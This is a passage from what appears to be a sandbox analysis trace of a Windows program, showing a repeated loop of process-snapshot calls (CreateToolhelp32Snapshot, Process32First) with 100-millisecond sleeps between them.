th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.821] Sleep (dwMilliseconds=0x64) [0271.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0272.000] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.170] Sleep (dwMilliseconds=0x64) [0272.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0272.224] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.397] Sleep (dwMilliseconds=0x64) [0272.440] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0272.451] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.647] Sleep (dwMilliseconds=0x64) [0272.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0272.670] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.782] Sleep (dwMilliseconds=0x64) [0272.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0272.920] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.157] Sleep (dwMilliseconds=0x64) [0273.168] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0273.190] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.284] Sleep (dwMilliseconds=0x64) [0273.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0273.307] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.379] Sleep (dwMilliseconds=0x64) [0273.381] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0273.391] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.470] Sleep (dwMilliseconds=0x64) [0273.471] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0273.488] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.564] Sleep (dwMilliseconds=0x64) [0273.565] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0273.577] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.648] Sleep (dwMilliseconds=0x64) [0273.664] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0273.673] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.745] Sleep (dwMilliseconds=0x64) [0273.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0273.756] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.854] Sleep (dwMilliseconds=0x64) [0273.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0273.915] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.990] Sleep (dwMilliseconds=0x64) [0273.996] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.008] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.081] Sleep (dwMilliseconds=0x64) [0274.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.092] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.163] Sleep (dwMilliseconds=0x64) [0274.164] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.174] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.268] Sleep (dwMilliseconds=0x64) [0274.269] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.282] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.354] Sleep (dwMilliseconds=0x64) [0274.358] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.368] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.451] Sleep (dwMilliseconds=0x64) [0274.452] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.468] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.540] Sleep (dwMilliseconds=0x64) [0274.541] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.553] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.623] Sleep (dwMilliseconds=0x64) [0274.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.635] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.706] Sleep (dwMilliseconds=0x64) [0274.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.723] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.794] Sleep (dwMilliseconds=0x64) [0274.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.806] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.891] Sleep (dwMilliseconds=0x64) [0274.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.905] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.981] Sleep (dwMilliseconds=0x64) [0274.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0274.996] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.119] Sleep (dwMilliseconds=0x64) [0275.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.132] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.202] Sleep (dwMilliseconds=0x64) [0275.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.214] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.311] Sleep (dwMilliseconds=0x64) [0275.312] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.326] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.400] Sleep (dwMilliseconds=0x64) [0275.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.412] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.484] Sleep (dwMilliseconds=0x64) [0275.486] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.501] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.573] Sleep (dwMilliseconds=0x64) [0275.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.586] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.656] Sleep (dwMilliseconds=0x64) [0275.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.668] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.739] Sleep (dwMilliseconds=0x64) [0275.740] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.750] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.824] Sleep (dwMilliseconds=0x64) [0275.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.850] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.923] Sleep (dwMilliseconds=0x64) [0275.925] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0275.935] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.019] Sleep (dwMilliseconds=0x64) [0276.022] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.039] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.112] Sleep (dwMilliseconds=0x64) [0276.116] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.127] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.208] Sleep (dwMilliseconds=0x64) [0276.210] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.220] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.326] Sleep (dwMilliseconds=0x64) [0276.329] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.343] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.414] Sleep (dwMilliseconds=0x64) [0276.415] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.426] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.502] Sleep (dwMilliseconds=0x64) [0276.504] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.515] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.591] Sleep (dwMilliseconds=0x64) [0276.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.606] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.695] Sleep (dwMilliseconds=0x64) [0276.697] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.707] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.784] Sleep (dwMilliseconds=0x64) [0276.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.796] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.880] Sleep (dwMilliseconds=0x64) [0276.882] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.894] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.970] Sleep (dwMilliseconds=0x64) [0276.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0276.986] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.058] Sleep (dwMilliseconds=0x64) [0277.061] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0277.071] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.142] Sleep (dwMilliseconds=0x64) [0277.144] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0277.155] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.225] Sleep (dwMilliseconds=0x64) [0277.227] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0277.239] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.342] Sleep (dwMilliseconds=0x64) [0277.345] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0277.356] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.427] Sleep (dwMilliseconds=0x64) [0277.428] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0277.531] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.610] Sleep (dwMilliseconds=0x64) [0277.614] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0277.624] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.707] Sleep (dwMilliseconds=0x64) [0277.709] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0277.723] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.795] Sleep (dwMilliseconds=0x64) [0277.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0277.807] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.926] Sleep (dwMilliseconds=0x64) [0277.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0277.950] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.025] Sleep (dwMilliseconds=0x64) [0278.056] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0278.071] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.195] Sleep (dwMilliseconds=0x64) [0278.235] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0278.266] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.400] Sleep (dwMilliseconds=0x64) [0278.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0278.448] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.603] Sleep (dwMilliseconds=0x64) [0278.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0278.749] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 